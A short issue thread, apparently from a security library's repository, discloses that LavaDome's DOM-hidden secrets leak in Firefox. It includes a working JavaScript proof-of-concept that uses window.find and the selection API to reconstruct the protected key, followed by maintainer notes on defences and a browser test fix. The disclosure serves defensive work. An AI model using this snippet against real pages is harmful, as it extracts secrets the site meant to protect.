LavaDome is vulnerable to selection API

[weizman]

When running in Firefox, Secret protected by LavaDome can easily be leaked.

• Visit the demo using Firefox
• Open console and run the code below, see how full key is obtained by code

setTimeout(()=>{
    document.body.prepend('xxx');
    const result = [];
    for (const l of 'abcdefghijklmnopqrstuvwxyz0123456789') {
        while (find(l)) {
            const anchor = getSelection().anchorNode;
            const host = anchor?.parentNode?.parentNode?.host;
            if (host instanceof HTMLElement) {
                const at = Array.from(host.parentElement.children).indexOf(host);
                result[at] = l;
            }
        }
        window.find('xxx', false, true);
    }
    console.log('key', result.join(''));
}
, 1000);

[weizman]

We saw that coming already (see "secret splitting" section).

I don't see a way around this at the moment, so either we convince browsers to ship a native and secure Snow version (which will take years) or we convince Firefox to fix the bug that's causing this (wip)

Or we come up with a clever defense. I thought about making use of selectionchange event which captures the find call, but since attack is sync, the secret is compromised before the event fires...

I wonder how this one will play out

[weizman]

WPT regarding this merged https://github.com/web-platform-tests/wpt/pull/47024/files 🤞